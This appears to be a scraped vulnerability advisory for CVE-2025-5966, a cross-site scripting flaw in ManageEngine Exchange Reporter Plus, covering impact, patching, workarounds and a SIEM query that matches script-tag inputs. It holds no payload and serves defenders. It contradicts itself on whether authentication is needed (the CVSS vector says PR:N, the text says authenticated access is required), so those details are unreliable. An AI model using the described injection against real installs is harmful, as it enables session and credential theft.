CVE-2025-5966

Q: What is the severity of CVE-2025-5966?

CVE-2025-5966 has a CVSS score of 8.1 (HIGH). This vulnerability allows attackers to inject malicious scripts into the 'Attachments by filename keyword' report feature in ManageEngine Exchange Reporter Plus. When users view these reports, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. Organizations using Exchange Reporter Plus versions 5722 and below are affected.

8.1 HIGH

Cross-Site Scripting

📋 TL;DR

This vulnerability allows attackers to inject malicious scripts into the 'Attachments by filename keyword' report feature in ManageEngine Exchange Reporter Plus. When users view these reports, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. Organizations using Exchange Reporter Plus versions 5722 and below are affected.

💻 Affected Systems

Products:

Zohocorp ManageEngine Exchange Reporter Plus

Versions: 5722 and below

Operating Systems: Windows

Default Config Vulnerable: ⚠️ Yes

Notes: All installations with the vulnerable version range are affected regardless of configuration.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, pivot to internal systems, install backdoors, or exfiltrate sensitive Exchange server data.

🟠

Likely Case

Session hijacking leading to unauthorized access to Exchange Reporter Plus, potential data exposure, and limited lateral movement within the application.

🟢

If Mitigated

Limited to defacement or nuisance attacks if proper input validation and output encoding are implemented.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to create malicious reports, but the attack is straightforward once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5723 or later

Vendor Advisory: https://www.manageengine.com/products/exchange-reports/advisory/CVE-2025-5966.html

Restart Required: Yes

Instructions:

1. Download the latest version from ManageEngine's website. 2. Backup your current installation. 3. Run the installer to upgrade. 4. Restart the Exchange Reporter Plus service.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement server-side input validation to sanitize filename keyword inputs before processing.

Output Encoding

all

Apply proper HTML encoding to all user-controlled data displayed in reports.

🧯 If You Can't Patch

Restrict access to the report creation feature to only trusted administrators.
Implement a web application firewall (WAF) with XSS protection rules.

🔍 How to Verify

Check if Vulnerable:

Check the installed version in Exchange Reporter Plus admin console under Help > About.

Check Version:

Not applicable - check via web interface

Verify Fix Applied:

Verify version is 5723 or higher and test report creation with malicious script inputs.

📡 Detection & Monitoring

Log Indicators:

Unusual report creation patterns
Requests containing script tags in filename parameters

Network Indicators:

HTTP requests with JavaScript payloads in report-related endpoints

SIEM Query:

source="exchange_reporter_plus" AND (url="*report*" AND (param="*<script>*" OR param="*javascript:*"))

📊 Metadata

CVE ID: CVE-2025-5966

CVSS v3 Score: 8.1 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CWE: CWE-79

EPSS Score: 0.75% exploit probability (72.7th percentile)

Published: June 26, 2025

Last Updated: September 29, 2025

🔗 References

https://www.manageengine.com/products/exchange-reports/advisory/CVE-2025-5966.html Vendor Advisory

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

Manageengine Exchange Reporter Plus by Zohocorp

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Input Validation Filter

Output Encoding

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities